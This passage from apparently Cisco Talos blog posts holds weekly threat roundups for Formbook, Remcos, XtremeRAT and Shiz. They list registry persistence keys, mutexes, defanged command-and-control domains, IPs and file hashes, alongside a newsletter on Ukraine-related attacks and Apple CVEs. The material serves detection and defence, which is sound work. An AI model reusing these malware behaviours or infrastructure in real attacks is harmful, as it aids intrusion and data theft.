03766a0f7239053205ddf362d05c9714374468c47b7978c5f180d4346ad8dd75 04d8e6413d217a3b8667284be0d3f1fc586a12ccb29f03f798b48e92c2ba2a6a 051c2a84fd29361d952dc213ebaa39da5dadfa41927b9424e8960e79556ff91d 08c9702801db0785656c59c1d180a3a026ece467bf674aeaf9329611ae442306 13c0b67b1985e5e8292200b4c340090d5cc9ef1885a1f891b00f6f08a33c45da 1506c249e7b6fc69f4c1ec396ccc692de2c8546685f6aed55e5bcf33849255ab 1bea6b0a9773065b3ef5ed3ce7c3ad5a2b495406a539b4dccb3c1e32073961e4 1cbf4d46e6d149b1f97de0013aea8bda5b2f4535a1b5fca4ca8739e88f95a4ba 22f80ae2cad2fd2aa7a7cb0565721804cd24c72e2eeaeb2783ef70f81b99e843 2a2b148519552d60b9c62b888f0d9ee578113f5ce58256d8471913dfb5a32578 2eed91ed6b2132227ac6b4889bbe8d355af50741cf8cef18cbed1e4395c8c42d 370ce2f768b84e42a2c56e597fe7a2d86799a7715e683e59fc4beb826a69ba6c 3d6425c514e23ca7982ab26f5b2f1ca29abada5b15e19826611be2610be094bc 4294385e9d05112594442aa9b7dcbc37a39a1324301c5e80e8d2549ba984b537 46324728750feb25ce7ce3f933aed27cb0daf27731205b0e05dbbba4923faf36 47122b45356ff2c4f0edfa9048cb93f11c277b05287ae178436083a255719d1f 4be4967316c1b328c834cc67659c4d441a94d5625be466a0010138f90d7a0279 4e382da874ae16b2ba6b98b3398db36bd3c6623d0708f4d10571dc15baac1c65 52d93afc8cb34ee03f9fbf9c38a519573f78bf3e05ab428ae33efc84aa48b419 5887043c8072209c8a0060620a6161446aae16c9b47f71ad6f26e77bdc448ecc 5f3dd03b1c9156a7adf1926b4aacc9e799aa18b3e28eefe9be5e2f19229a0544 606bc0f3eb81ef1f352adfad845122dac3d67294bc5218aead9c9d43ab771133 654ad2f7e51da105511c1963e47206a7cbd45d50d9637f1411c0a31a4639e342 67c0c1048e1a354c6bc71745f552d7c2e51311ae6983cddce72526c4e0da3022 6942e3afa79edc13dcfd9a3d7142b960bf4b13618b1918dab731ba7dadb0eaa4
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Formbook-9964246-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
11
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\INTELLIFORMS\STORAGE2 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Ejetkygbp
1
Mutexes Occurrences
8-3503835SZBFHHZ 1
862Q-UTS0E2J0FF1 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]42[.]12/31 4
172[.]64[.]149[.]82 4
104[.]18[.]38[.]174 3
162[.]159[.]136[.]232 1
20[.]190[.]154[.]18 1
52[.]95[.]165[.]126 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
onedrive[.]live[.]com 11
cacerts[.]digicert[.]com 7
login[.]live[.]com 1
discord[.]com 1
www[.]samtaxitours[.]com 1
dioefa[.]ph[.]files[.]1drv[.]com 1
patronkingoopsalmghandnaiojamexicoquadaras[.]s3[.]sa-east-1[.]amazonaws[.]com 1
vuladq[.]am[.]files[.]1drv[.]com 1
dimk5w[.]ph[.]files[.]1drv[.]com 1
njie9a[.]am[.]files[.]1drv[.]com 1
ibjoxq[.]dm[.]files[.]1drv[.]com 1
zlpuma[.]bn[.]files[.]1drv[.]com 1
rqy3zg[.]db[.]files[.]1drv[.]com 1
Files and or directories created Occurrences
%APPDATA%\862Q-UTS 1
%APPDATA%\862Q-UTS\862log.ini 1
%APPDATA%\862Q-UTS\862logrc.ini 1
%APPDATA%\862Q-UTS\862logri.ini 1
%PUBLIC%\Libraries\Ejetkygbp.exe 1
%PUBLIC%\Libraries\pbgyktejE.url 1

File Hashes

0f972ec1fd4fb660cc86ed459c5a793a134451d479154b00a2d4a1a360d44e42 13e91b5a246dc5f98cc413508e78136fd38c9f2e9151c65a96f509b2d82ddf46 13f7ce642c44202a089400e9b33db0ed02f824b5291ed4b5da3d080ecc40589f 14ce5ef3e6e3d3354150ae58fd4e9938bcb747c5e4190bd5f793043355e009e4 5a377c52fb8f4bbce7272f13d3f6ac8c36ce7a6f51561ed0a79cca6b8facf23e 5fb5546859ff3e2a9d75d37a208f43449f254442f67a2da49b60cfd169abdc44 6555c0d7b9acbff665b84aec9164dd1cf01740a10e735791f25c28a5da830740 6c232920b9bb1f2c3bf71124f93f06f49fdf41c3bae35237f7b031bebba14cc5 b4175a0744b29d7aecf1245dfb253e6417f839d2eeb2ef90b8ed222e1387aa1e c2062d2d3ac3815d7a050a1bfb261c98581e7398f8b0c7ca670d7ddb328611d2 c6628dd39b388886cc7867d66b7a133f61b666421ad489bb0bddaf5c856ce841 cac68bb4b0df3a7078d4c66d810a0d8f8863afd22722cd3dd0788af291dd1853 cdcf2ed4c36ebd0856e7663921d67c31e51ad8a6cbb5c5cdd401d30812e25a62 d332fa69a36ac7e14d35c336a609a04f74e8da6c51b6ad6286f23ad5f2837cd8 dc31d2ad84fda1d9af2e623493e1e4f5dcfc8aa3abd55c6d58d1eae807cb56d8 e62a70218462e892bcf89e851549e6a4f75131d52d57734bc642332141169aa9 eda74534f0c37003022c0003d4b4c3262016d486d919298a323164eae4f0925a ee2ced66adeccfe45722c49efd8b99fd032d0426ff74cd10fc1e182521431404

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Remcos-9964868-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\REMCOS_VOXCYIGINC 14
<HKCU>\SOFTWARE\REMCOS_VOXCYIGINC
Value Name: EXEpath
14
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
12
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
12
Mutexes Occurrences
Remcos_Mutex_Inj 14
remcos_voxcyiginc 14
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
urchamadi[.]ddns[.]net 14
Files and or directories created Occurrences
%APPDATA%\remcos 14
%APPDATA%\remcos\logs.dat 14
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\windows.vbe 14
%APPDATA%\windows.exe 14

File Hashes

027f1a3e4c10fcf167c4df0451862b388e934e0ec1ee0f799f5113d830566415 280e9283aa6b2a3f5237de7c01d2ae8abaa9ba4e54655e3f367e889407f259ec 47dc41e8614cfa6f3e7fcd6d718321db4c9306146a176632aa124b345d530611 56f3edac172934d7ceea861ecffc2a727241deb5e939d1b69c5220c7333bef8c 616b57cac5aa00dfb8030f79094d170bad2b6a082bb963594cfc29397cce8b5d 83ab1ddbc24e145b0e170e8af46f3fc5fd4f6e1f571abac0aed6992c5d136071 af24dd23d021d1e43844af9cb31ba7f552377c7a7e49d536abbf2a6ecf1b54a2 b203e1e8f2083c7edf540cb91c424915bed88565dcaac579ffba224d4d76c714 b2516e86182da64f80fbf82cf84a6bcfcd37547cea16d1ff07a75c866fd4d36f d1e35f8e65cd1da6f33177604901c8d6b1a77cf7ee0735aa0b072f492e3f2194 de62cfc82da844304fb94bef7151808d025b183c5df68c77dfad9a035dd41690 e30895e1d44a156b336bfc8a685d5d2176341cb24620f51b5732f60ab64167f5 f127a27a300ecd23bc6115577884521a30884d67251df39fcbdecb63aaba3523 ff307f7c3f5c00ba357b696914a2772ddd656fa29c501eda006b7bbb91440607

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.XtremeRAT-9964479-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: EnableBalloonTips
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
12
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UACDisableNotify
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 10
<HKCU>\ENVIRONMENT
Value Name: ProgramData
8
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: explorer
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: explorer
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: explorer
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: services
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: services
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: services
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: spoolsv
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: spoolsv
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: atiedxx
1
<HKCU>\SOFTWARE\MICROSOFT\FEEFA 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: atiedxx
1
<HKCU>\SOFTWARE\MICROSOFT\OPKYIF 1
<HKCU>\SOFTWARE\MICROSOFT
Value Name: zupi.exe
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: atiedxx
1
<HKCU>\SOFTWARE\MICROSOFT
Value Name: uwhuevat.exe
1
<HKCU>\SOFTWARE\MICROSOFT\FEEFA
Value Name: Yrivxya
1
<HKCU>\SOFTWARE\MICROSOFT\OPKYIF
Value Name: Otmabyek
1
Mutexes Occurrences
6nkxLO02qtXYL2vjf6Q3Ld1BXvM8Xk 4
Local\{E79956D8-8C6C-29D3-F3B6-46F6B67AA745} 3
Local\{E79956DA-8C6E-29D3-F3B6-46F6B67AA745} 3
Local\{E79956DB-8C6F-29D3-F3B6-46F6B67AA745} 3
GLOBAL\{<random GUID>} 3
qYLS3Rl0xK7U0fJaaFHI9gyEU4OQEO 2
JbdhwlrcWDpyZ78nPglBqnLY8exSoG 2
hbOblX81rgTLtJRBvLX2JB0nKVPZRh 1
BRMVTk3lQ1Jq0Oqd4zcgHKYq4NnaR9 1
f5SUSZmQlEOC00yG9p1Ivna3rOzI0e 1
akRIZKudnSn2WvMCpN5alLvywbcRXT 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
23[.]202[.]81[.]150 12
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
tulipbloom[.]in 6
iamthecause[.]top 3
www[.]tribosjovens[.]org[.]br 1
www[.]streetfighterx[.]top 1
www[.]cheapestconcerttickets[.]top 1
Files and or directories created Occurrences
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe 6
%APPDATA%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33}\Off.c 6
%APPDATA%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33} 6
%APPDATA%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33}\explorer.exe 6
%System32%\Tasks\explorer.exe 6
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\services.exe 3
%System32%\Tasks\services.exe 3
%TEMP%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33} 3
%TEMP%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33}\services.exe 3
%TEMP%\com6.{00C6D95F-329C-409a-81D7-C46C66EA7F33}\Off.c 3
%ProgramData%\<random, matching '[a-z0-9]{3,7}'> 3
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\spoolsv.exe 2
%TEMP%\com8.{15eae92e-f17a-4431-9f28-805e482dafd4} 2
%TEMP%\com8.{15eae92e-f17a-4431-9f28-805e482dafd4}\spoolsv.exe 2
%TEMP%\com8.{15eae92e-f17a-4431-9f28-805e482dafd4}\Off.c 2
%TEMP%\D0B38F0F.cmd 1
%TEMP%\DA9F635A.cmd 1
%TEMP%\AA95177A.cmd 1
%TEMP%\4DA5383F.cmd 1
%TEMP%\D925C77F.cmd 1
%TEMP%\F0470C51.cmd 1
%APPDATA%\com3.{025A5937-A6BE-4686-A844-36FE4BEC8B6D} 1
%APPDATA%\com3.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}\atiedxx.exe 1
%TEMP%\97BB41A5.cmd 1
%TEMP%\5DBB78C4.cmd 1
*See JSON for more IOCs

File Hashes

048b8ea9aef3287bae09d9327536faea0b662d48e9cb0d477e88805a7797bcc7 21cd479707dc5865122fa6f1cc638ab15953b09c43ee41abc8a197823a60b65b 34e610d6e74bc3332d7a8a25f61f6a979be8deab8dc1f8f6fdf487dd4ddd3070 5ea6b3668a008b77f6dff12788101e258e6c90d2b08de9e89d7d886834d98ad0 63cae1e75e5d8e54c8dfccebe7552e5a9aa2592cf259357a516d0115ebcf655e 75ee917f5022839d776082a470333a6c6c82069a7f443005f77cce1ff2ccaeb9 7817f2ee4c83e004d9b9602d8f68adc04076f949e1bc868a3bb28c47d98a4933 8159704f8517ba8d8a2f9ea6ec42f5fd4e18438c940806e48dcdd726b923ab66 856869554541785eaadb13c38bfb22392c38254968fc9a41d8d0f1c2b4d420be 8c99d803e23df187a0925aade258e7eeb1dea15607670a05f1fade726320cc05 8e770cc47212a54fee1deb9a642c6afb52238c176cc00bdd2fd3d473e3b601fc a79939e710792b9d290f2ee2a9ae82529b4b78ba7a578341e52a7994aef5ef11 b9298520c6b390e4fb488f7fc7d99d1651c28482b06e6c008512e29049714a20 cc9d4f4daddee4e5e0c9839543c0c84360c8cc42758f894bc13bb814fbd572f1 da303496b9ba5a139b724e5cd1d35da3d04b89ccd82b281de14e8febb68f4eb6

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.Shiz-9964480-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT
Value Name: 67497551a
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: 98b68e3c
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: userinit
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: System
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: load
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
26
Mutexes Occurrences
Global\674972E3a 26
Global\MicrosoftSysenterGate7 26
internal_wutex_0x000004b4 26
internal_wutex_0x0000043c 26
internal_wutex_0x000004dc 26
internal_wutex_0x<random, matching [0-9a-f]{8}> 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 13
45[.]33[.]18[.]44 7
45[.]79[.]19[.]196 5
45[.]33[.]2[.]79 5
173[.]255[.]194[.]134 5
45[.]33[.]20[.]235 5
198[.]58[.]118[.]167 4
72[.]14[.]185[.]43 4
96[.]126[.]123[.]244 3
45[.]56[.]79[.]23 3
45[.]33[.]30[.]197 3
72[.]14[.]178[.]174 3
45[.]33[.]23[.]183 1
85[.]94[.]194[.]169 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
gahoqohofib[.]eu 26
rytifaquwer[.]eu 26
kepujajynib[.]eu 26
lyrosajupid[.]eu 26
tuwaraqidek[.]eu 26
xuqeqejohiv[.]eu 26
pumebeqalew[.]eu 26
cinycekecid[.]eu 26
divulewybek[.]eu 26
cilakyfaloq[.]eu 26
vocijekyqiv[.]eu 26
foxofewuteq[.]eu 26
nozapekidis[.]eu 26
makymykakic[.]eu 26
galerywogej[.]eu 26
qeguxylevus[.]eu 26
rydohyluruc[.]eu 26
lysafurisam[.]eu 26
tupepulofup[.]eu 26
kefilyrymaj[.]eu 26
purumulazux[.]eu 26
xutyrurojah[.]eu 26
ciqivutevam[.]eu 26
dimoxuzynup[.]eu 26
citonocebyl[.]eu 26
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 26

File Hashes

0aa01d0e6ab4b0dab543cd0f7d226a1971c896c1b5668ef55d5d84fd8aac331f 232b980cba11ed3757cd13e6e4ec20993f819d07254999411e7a308561f10ac9 27eb369a639c17edfcc1eefc7f2d21d0680f62dd00a7bd2cf0a3d50030134dc9 2ebf268325f6e2840fa65e481e61cee94d0dc889f3f032abdf7492dd7772be07 31532a2178c74921a141b257175fd25aa587d611e480ae6399255000a875f86b 3634d7d5b0e31a068dbb17eec6dd39b927dc2e6ca7a7d1f50fe122fd9a348578 3ce214e14dc05772c4f6ed8bf5df0c2f6916c3cb78cad5ec7960e8a5aa3183dd 3db521931dd32b2d76a0b694eba198d54db0642289c4c04797d81abba1e8cc1c 44aaba781695fd9c5a859fe91a1b251f3700cfc65d20c70827108aade73a2d47 491e939589d3df18f8c2601acd0ecb2e730744625208a9ef10e1153c8fbd999d 4aef6f77172ffbe97608338d59b4e327f80ac6b1280234acfd1a35c519a8cc54 5153f49e288d120950522e3cedade50d389452cb5344344672b1dbbe4fd6b2c3 5950d60ccaf62ebbd4d8e6f67c8aae6ffa9d7c7f3950aa3aa6c97810f2e192b4 5bdcf125d1dd26dc4eea102736976a474e7c95ca4486ca8e13cf404ed6b54661 66703ea93baf17db72cce7c91b39df923574a9173768ebfda5f78580e1f1e05e 6728f5c294584f01a2e8a8f320cce6df9a85656b582f29e7dcd1b226d51d0b46 706de588bf28a2345331005686aeb0a65d92eea4195050f948577ce0623bc7b3 8818d782007a434aaf773fa601467cb8ea9514ffbdba74a4b2cf8ad0ee096110 914e601f65f04fb41f1ede09babc33d9d067fdf089a6f720eb7dcb5489da182c a3b5359d0320885dc46a8e01583304adcc8f8697bd72d4a9fa1e02b0d210e061 b9d4f9b412b05af3a6f1b601041422117f3c4ccdfa02b140a1b06da1ba53193b bcf08953ce18c297e8b3714bd66563fde1d031b9eec8c26cc5a880f6b57eea5c bd984088a849d6b0593a970dec6a8792b82c8c04edecd4032cfd6a447d4f3c48 c7297544b35ded090c59b73c53c1c6a3f50b0b30206f237c1f84114b01adcdfd ccaa68c04b2d4378b62753b540e5b25cb36e6334a48a10eb9975c2064fc393da
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Threat Source newsletter (Aug. 25, 2022) — We're still not talking about Ukraine enough

25 August 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

Russia’s invasion of Ukraine was once the most talked about story in the world. Six months into the conflict, modern attention spans have moved on to other news stories. But Ukraine Independence Day yesterday should serve as a reminder to everyone that the threats to Ukraine have not gone anywhere. 

The country still faces a physical conflict with Russia every day that seemingly has no easy end, and the barrage of cyber attacks is suspected to continue.  

As discussed in our livestream yesterday, Talos continues to see evolving cybersecurity threats in the region, including the most recent GoMet backdoor. And as Joe Marshall highlighted in his blog post last week, Ukraine’s agriculture industry — which is vital to the global food supply chain — remains vulnerable to kinetic and virtual attacks. Because there’s been no one major cyber attack against Ukraine since Russia’s invasion began, the larger public perception is that things haven’t been “that bad.” But state-sponsored actors have continually barraged Ukrainian government entities and critical infrastructure with a range of attacks, including the infamous Fancy Bear and Sandworm groups.  

Ukraine’s state nuclear power company also said last week that state-sponsored actors launched a three-hour attack on its websites. 

A three-hour distributed denial-of-service attack isn’t going to headline the nightly news, but that doesn’t mean they aren’t happening and making it harder for the Ukrainian government and critical infrastructure to operate. There are people who, six months into this, are still having to fend off cyber threats daily, sometimes just to keep the internet on or to make sure that week’s grain shipment goes out on time. 

While headlines come and go, it’s important to remember that there are some things always going on in the background that are bigger than newer headlines that distract us to talk about the newest trojan someone found on the Android store.  
  

The one big thing 

All Apple users should update their devices if they haven’t already. The company released updates for iOS, iPadOS and macOS last week, warning of two vulnerabilities that could have been exploited in the wild. CVE-2022-32894 is an out-of-bounds write issue in the operating systems’ kernel that an adversary could exploit to execute arbitrary code with kernel privileges and take control over the system. CVE-2022-32893 is an out-of-bounds write issue in WebKit that can also lead to arbitrary code execution. 

Why do I care? 

While Apple did not disclose any details of attacks potential exploiting these issues, it did say it was aware of a report that the issues “may have been actively exploited.” Apple says the vulnerabilities exist in iPhone 6s and later, all models of the iPad Pro, the iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later and iPod touch 7th generation. Any users of these devices should patch as soon as possible. 

So now what? 

Patch, patch and patch again if you’re using any Apple devices. 

 

Top security headlines from the week


The LockBit ransomware’s website was hit with a large distributed denial-of-service attack after threatening to leak documents belonging to a cybersecurity firm. At one point, the site displayed a warning that the ransomware gang plans to upload the targeted company’s stolen data to peer-to-peer networks. Talos’ own Azim Shukuhi first tweeted that a LockBit member told him the site's servers were receiving “400 requests a second from over 1,000 servers” in a possible “hack back” attack. DDoS attacks aim to disrupt a site’s operations by flooding it with traffic and messages, forcing it to essentially shut down for a period of time. (The Register, TechCrunch

Former Twitter Head of Security Peiter "Mudge" Zatko filed a complaint to the U.S. Securities and Exchange Commission alleging that Twitter is not doing enough to crack down on bot and spam accounts. Mudge is known for being involved with the “Cult of the Dead Cow” hacking group, one of the first groups of its kind in history. The testimony to the SEC also stated that too many Twitter employees have access to critical user data and the company was not actually deleting user data when it was asked to. The number of bot accounts on the social media site is central to a failed bid for Elon Musk to buy the company. (CNN, The Verge

The FBI is warning that threat actors are increasingly hijacking home IP addresses to disguise credential-stuffing attacks. An investigation from the FBI and their Australian counterparts uncovered two sites that contained more than 300,000 unique credentials that were for sale, warning they could be used in attacks against private companies. The actors are setting up proxies to disguise the flood of login attempts, and by using residential IP addresses, they can avoid usual detection techniques. (Cybersecurity Dive, FBI


Can’t get enough Talos? 


Upcoming events where you can find Talos 


Virtual 

Most prevalent malware files from Talos telemetry over the past week  


SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 2c8ea737a232fd03ab80db672d50a17a    
Typical Filename: LwssPlayer.scr    
Claimed Product: 梦想之巅幻灯播放器    
Detection Name: Auto.125E12.241442.in02 

MD5: 7bdbd180c081fa63ca94f9c22c457376 
Typical Filename: c0dwjdi6a.dll 
Claimed Product: N/A  
Detection Name: Trojan.GenericKD.33515991 

MD5: a087b2e6ec57b08c0d0750c60f96a74c     
Typical Filename: AAct.exe     
Claimed Product: N/A       
Detection Name: PUA.Win.Tool.Kmsauto::1201  

MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201  

Ukraine Independence Day: Talos update

24 August 2022 at 16:39
On Independence Day for Ukraine, Aug. 24, 2022, Cisco Talos provided a live update on its continued support for the region.  

Six months since Russia's invasion of Ukraine, Dmytro Korzhevin, a senior threat intelligence researcher, JJ Cummings, Talos' national intelligence principal, and Ashlee Benge, a strategic intelligence lead, provided insights into their past few months of work in the region.

The discussion primarily focused on the resiliency of Ukrainians, who have worked tirelessly over the years to transform their cybersecurity capabilities. Ukrainian infrastructure has largely stayed operational and, in most cases, exceeded expectations. It seems to have baffled most pundits, but for those that have spent years working in Ukraine, it’s no surprise about the levels of dedication and commitment to protecting their critical infrastructure from those that would do it harm.  

The team also covered how groundwork laid years ago is paying dividends now during the war, as well as an update on the types of cyber threats we’re observing, including the deployment of the GoMet backdoor

At the beginning of the broadcast, Korzhevin shared what Independence Day of Ukraine means for him. 

"Independence is not an extra day off, but a value that should be used for the benefit of every citizen of our country," he added after the stream. "Independence is the will. Independence lives in every person. If we are independent, it means that we are free. That is, we live, not exist. The same goes for the state. Independence of Ukraine is when we have the possibility to develop the state as we want it and not as we are told when we have a real own history and not a twisted one when we speak our native language and not a hostile one. And now that there is a war in Ukraine, the most important task of our people is to preserve Independence. So that we, our children, grandchildren and all future generations of Ukrainians could live and build our state based on national traditions and core democratic values. Independence is primarily a way, not a condition. I believe that we will overcome all the difficulties in this way."

Bengee added that Cisco and Talos have several resources available to any organizations in Ukraine that are in need of assistance. 

"If you are an organization in Ukraine who is interested in having Talos’ help, and you would like to participate in our threat hunting program, please reach out via our social channels," she said. "We are offering our security products for free to Ukrainian organizations, as it's important to us to continue to support Ukraine throughout the duration of the conflict."

A recording of the broadcast is available here and above.

Threat Roundup for August 12 to August 19

19 August 2022 at 22:24

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 12 and Aug. 19. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.Ramnit-9964110-0 Dropper Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It could also steal browser cookies and hide from popular antivirus software.
Win.Ransomware.Locky-9963624-0 Ransomware Locky is ransomware typically distributed via spam emails containing a maliciously crafted Microsoft Word document crafted to trick targets into enabling malicious macros. This family was originally released in 2016 and updated over the years with additional functionality.
Win.Dropper.Shiz-9963681-0 Dropper Shiz is a remote access trojan that allows an attacker to access an infected machine to harvest sensitive information. It is commonly spread via droppers or by victims visiting a malicious site.
Win.Dropper.XtremeRAT-9963701-0 Dropper XtremeRAT is a remote access trojan active since 2010 that allows the attacker eavesdrop on users and modify the running system. The source code for XtremeRAT, written in Delphi, was leaked online and has since been used by similar RATs.
Win.Dropper.Nanocore-9963905-0 Dropper Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
Win.Ransomware.Cerber-9964084-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.
Win.Dropper.Dorkbot-9964085-0 Dropper Dorkbot is a worm that spreads itself through social networking sites and messaging apps. Once installed, the infected computer becomes part of a botnet, allowing the controller to control the machine remotely.
Win.Worm.Kuluoz-9964104-0 Worm Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. It often is delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.

Threat Breakdown

Win.Dropper.Ramnit-9964110-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Mutexes Occurrences
{79345B6A-421F-2958-EA08-07396ADB9E27} 26
